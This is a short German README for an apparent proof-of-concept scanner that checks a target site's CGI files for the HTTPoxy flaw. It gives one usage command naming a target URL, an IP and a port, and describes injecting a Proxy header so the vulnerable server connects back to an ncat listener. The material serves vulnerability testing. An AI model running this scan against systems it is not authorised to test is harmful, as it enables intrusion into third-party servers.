
HTTPoxy Exploit Scanner von 1N3 @CrowdShield
von 1N3 @CrowdShield (https://crowdshield.com) Zuletzt aktualisiert: 20160720
PoC/Exploit Scanner zum Scannen gängiger CGI-Dateien auf einer Ziel-URL auf die HTTPoxy-Sicherheitslücke. Httpoxy ist eine Reihe von Sicherheitslücken, die Anwendungscode in CGI- oder CGI-ähnlichen Umgebungen betreffen. Für weitere Details besuchen Sie https://httpoxy.org.
Erfordert ncat, um eine umgekehrte Sitzung aufzubauen
./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000
Dies wird https://target.com mit einer Liste gängiger CGI-Dateien scannen, während ein Proxy-Header zurück zu einer bestimmten IP:PORT eingefügt wird. Ein Reverse-Listener fängt die eingehende Verbindung ab, um zu bestätigen, dass die entfernte Seite verwundbar ist.
Ich übernehme keine Verantwortung für Fehlverhalten oder Missbrauch dieses Exploits.